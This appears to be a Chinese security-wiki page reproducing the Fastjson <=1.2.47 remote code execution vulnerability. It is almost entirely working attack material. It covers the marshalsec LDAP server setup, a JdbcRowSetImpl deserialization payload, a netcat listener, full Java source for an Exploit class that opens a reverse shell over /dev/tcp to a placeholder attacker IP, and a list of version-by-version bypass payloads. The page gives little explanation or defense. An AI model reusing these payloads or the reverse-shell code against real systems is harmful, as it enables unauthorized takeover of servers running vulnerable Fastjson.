menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Fastjson =1.2.47 远程代码执行漏洞 chevron_right Fastjson =1.2.47 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Fastjson =1.2.47 远程代码执行漏洞.md
    2.95 KB / 2021-07-15 19:52:54
        Fastjson \<=1.2.47 远程代码执行漏洞
===================================

一、漏洞简介
------------

二、漏洞影响
------------

Fastjson \< 1.2.47

三、复现过程
------------

**https://github.com/ianxtianxt/fastjson-1.2.47-RCE-1**

-   执行:

```{=html}
<!-- -->
```
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IPvps/#Exploit

1.png

-   修改反弹ip和端口:

```{=html}
<!-- -->
```
    vim Exploit.java

-   编译生成class://`需要使用jdk1.8,否则会报错`

```{=html}
<!-- -->
```
    javac Exploit.java

-   开启http服务:

```{=html}
<!-- -->
```
    python3 -m http.server 80 或者 python -m SimpleHTTPServer 80

-   payload:

```{=html}
<!-- -->
```
    {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}

-   开启nc监听反弹:

```{=html}
<!-- -->
```
    nc -lvvp 8888

### 反弹shell poc补充

#### **java反弹shell,无法直接使用bash -i \>& /dev/tcp/攻击服务器ip/8888 0\>&1**

    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;

    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/攻击服务器ip/888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));

            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }

            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }

        public static void main(String[] args) throws Exception {
        }
    }

### 补充

**https://github.com/ianxtianxt/Fastjson-1.2.47-rce**

    1.2.24
    {"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

    未知版本(1.2.24-41之间)
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

    1.2.41
    {"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

    1.2.42
    {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

    1.2.43
    {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

    1.2.45
    {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

    1.2.47
    {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}
    links
    file_download